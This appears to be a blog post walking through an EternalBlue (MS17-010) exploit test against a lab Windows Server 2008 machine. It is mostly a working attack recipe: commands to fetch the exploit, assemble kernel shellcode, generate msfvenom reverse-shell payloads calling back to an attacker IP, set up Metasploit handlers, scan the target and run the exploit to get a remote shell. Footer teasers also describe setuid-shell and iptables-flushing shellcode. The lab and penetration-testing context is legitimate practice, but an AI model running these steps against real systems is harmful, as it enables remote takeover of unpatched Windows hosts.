Skip to main content

Eternalblue test for Windows Server Standard 2008 SP1 32bit

This is a test of an Eternalblue exploit script from worawit:
https://github.com/worawit/MS17-010/blob/master/eternalblue_exploit7.py

The script claims to have been tested on:
- Windows 7 SP1 x64  
- Windows 2008 R2 SP1 x64  
- Windows 7 SP1 x86  
- Windows 2008 SP1 x64  
- Windows 2008 SP1 x86

Get the main script:
wget https://github.com/worawit/MS17-010/raw/master/eternalblue_exploit7.py

dos2unix eternalblue_exploit7.py

There is some shellcode required that has to be assembled. I downloaded and installed NASM on a Windows VM.

On my Windows 7 32 bit VM I downloaded the kernel shellcode from:
https://raw.githubusercontent.com/worawit/MS17-010/master/shellcode/eternalblue_kshellcode_x86.asm

I saved the shellcode into a file called:
sc_x86_kernel.asm

The shellcode needs to be in a raw binary form. I should be able to use NASM with the -f bin option to compile the assembly code to a raw binary file.

C:\Users\nc\AppData\Local\bin\NASM\nasm.exe -f bin sc_x86_kernel.asm -o sc_x86_kernel.bin


I copied this sc_x86_kernel.bin file using Filezilla to my Kali box.

Looking at this file:
https://github.com/worawit/MS17-010/blob/master/shellcode/eternalblue_sc_merge.py

It is my understanding that I need to create some shellcode with msfvenom and then concatenate that onto the end of this kernel shellcode.

Creating the Windows 32 bit shellcode using msfvenom:
msfvenom -p windows/shell/reverse_tcp LPORT=443 LHOST=10.10.77.185 --format raw -o sc_x86_msf.bin EXITFUNC=thread

Concatenating the 2 files:
cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin


On my Windows 7 64 bit VM I downloaded the kernel shellcode file from:
https://raw.githubusercontent.com/worawit/MS17-010/master/shellcode/eternalblue_kshellcode_x64.asm

I saved the shellcode into a file called:
sc_x64_kernel.asm

The shellcode needs to be in a raw binary form. I should be able to use NASM with the -f bin option to compile the assembly code to a raw binary file.

C:\exploits\shellcode>C:\Users\nc\AppData\Local\bin\NASM\nasm.exe -f bin sc_x64_kernel.asm -o sc_x64_kernel.bin


I copied this sc_x64_kernel.bin file using Filezilla to my Kali box.

Creating the Windows 64 bit shellcode using msfvenom:
msfvenom -p windows/x64/shell/reverse_tcp LPORT=444 LHOST=10.10.77.185 --format raw -o sc_x64_msf.bin EXITFUNC=thread

Concatenating the 2 files:
cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin


Create the eternalblue_sc_merge.py script with the contents consisting of the first 20 lines from here:
https://raw.githubusercontent.com/worawit/MS17-010/master/shellcode/eternalblue_sc_merge.py

Run the script to create the sc_all.bin file:
python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin

The last step is to test this against a vulnerable target.

First we need to set up some multi/handlers to catch the potential reverse connections:
service postgresql start
msfconsole -q
use exploit/multi/handler
set ExitOnSession false
setg LHOST 10.10.77.185
set PAYLOAD windows/x64/shell/reverse_tcp
set EXITFUNC thread
set LPORT 444
exploit -j
...
set PAYLOAD windows/shell/reverse_tcp
set LPORT 443
exploit -j


Ensure that our vulnerable target is running. IP address of the target is:
10.10.77.161

An nmap nse scan result says that the target is vulnerable:
nmap -sS -Pn -n -sV -p 445 --open --min-rate 10 --script smb-vuln-ms17-010 --script-args=unsafe=1 10.10.77.161 -oA "nse_vuln"
...
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
...

Run the script to see if we are in business:
python eternalblue_exploit7.py 10.10.77.161 sc_all.bin

We see something happened on the msfconsole:

Press the Enter key to get a prompt.

Run this to interact with the first session (sessions -l to see what sessions are available):
sessions -i 1


Resources:
NASM http://www.nasm.us/
Windows Server 2008 https://www.microsoft.com/en-ca/download/details.aspx?id=5023
Windows 7 download https://www.microsoft.com/en-ca/software-download/windows7
Kali https://www.kali.org/downloads/


Comments

Post a Comment

Popular posts from this blog

PolySetuidExecve1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-77.php My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolySetuidExecve1434.nasm Published : https://www.exploit-db.com/exploits/41498/ Original Shellcode bytes = 49 My version: Number of bytes = 31 Number of nulls = 0 PolySetuidExecve1434.nasm Intro This shellcode when executed will first setuid(0) and then execute /bin/sh and provide you with a shell. The purpose of calling setuid(0) is, suppose that you have managed to inject this shellcode into an executable that is Set-UID root. I...
Post a Comment
Read more

PolyFlushIPTables1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-683.php Original size: 50 bytes (don't believe what he says :) My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolyFlushIPTables1434.nasm Published : https://www.exploit-db.com/exploits/41503/ My version: Number of bytes = 47 Number of nulls = 0 PolyFlushIPTables1434.nasm  Intro This shellcode basically just executes /sbin/iptables -F without any other parameters. man iptables "-F, --flush [chain]               Flush ...
Post a Comment
Read more

Smbexec Install for Kali 2016.2

This is my how-to current as of August 31, 2017 . Context Kali Linux 2016.2 after: apt-get update apt-get upgrade apt-get dist-upgrade apt auto-remove restart Reason Training, see: https://www.cybrary.it/course/advanced-penetration-testing/ Video: https://www.cybrary.it/video/post-exploitation-part-4/ Downloads cd /opt git clone https://github.com/pentestgeek/smbexec.git git clone https://github.com/libyal/libesedb.git git clone https://github.com/csababarta/ntdsxtract /opt/NTDSXtract wget https://raw.githubusercontent.com/infoassure/dumpntds/master/dshashes.py -O /opt/NTDSXtract/dshashes.py Install Required Tools/Libraries apt-get install automake autoconf autopoint gcc-mingw-w64-x86-64 libtool pkg-config passing-the-hash ruby-nokogiri ruby-libxml libxml2-dev libxslt1-dev Build libesbdb cd /opt/libesedb/ ./synclibs.sh ./autogen.sh ./configure make Install Bundler gem install bundler   Install Smbexec First edit the file /opt/smbexec/smbe...
Post a Comment
Read more